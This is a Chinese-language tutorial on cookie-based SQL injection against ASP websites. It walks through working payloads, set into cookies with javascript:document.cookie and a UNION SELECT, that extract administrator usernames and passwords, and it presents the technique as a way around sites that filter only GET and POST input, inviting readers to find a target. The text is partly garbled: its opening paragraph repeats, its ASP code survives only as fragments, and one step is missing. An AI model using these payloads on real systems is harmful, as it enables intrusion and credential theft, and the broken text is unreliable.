具體的原理與分析過程我就不寫了,寫起來一大片,大家看的心煩我寫的頭痛,我就講操作過程中的細節。隱私報告里設置處需要接受所有的cookie將安全降低。
具體的原理與分析過程我就不寫了,寫起來一大片,大家看的心煩我寫的頭痛,我就講操作過程中的細節。隱私報告里設置處需要接受所有的cookie將安全降低。
cookie值是連接后才保存到本機的,也就是關IE后.
前提條件:一、網站沒有過濾cookie方式的注入。
二、需事前了解數據庫的管理員表段名,計算一下注入文件數據庫查詢語句在數據庫中的列數。
打開數據庫,找到Product這個表名,計算字段數為21個。管理員表名為admin 用戶與密碼字段名為username、password,呵呵沒有注入文件,我們可以自己構造一個測試方便大家的理解。
構造如下簡單注入ASP,當然我沒作什么嚴格的過濾,也就是接受任何方式的提交。.
//調用數據庫連接文件
")
else
%>
//反回指針處的內容,選取的字段與管理員的用戶密碼類型要相同
找前圖中的ID=55
構造聯合查詢語句
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 將6,2分別用username、password替換
來試試cookie注入。找個目標,注入點結構與前面相近就不再分析了,僅過濾了post與get注入.
步驟一:重新打開IE,先連接到需注入的網站http://127.0.0.1/nf,也就是去除前面的鏈接值。注意:不要直接在前面圖中的鏈接處操作,可以會不成功噢。
步驟二:清空地址處IE,再次在地址中加入如下
javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,
2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
再次清空IE打入http://127.0.0.1/nf/ProductShow.asp
步驟四:重復步驟一.注意此步驟必需操作,很多人失敗就在這里。
步驟五:清空地址處IE,再次在地址中如下代碼
javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,
username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
步驟六、再次清空地址處IE。http://127.0.0.1/nf/ProductShow.asp
好了全文結束。
|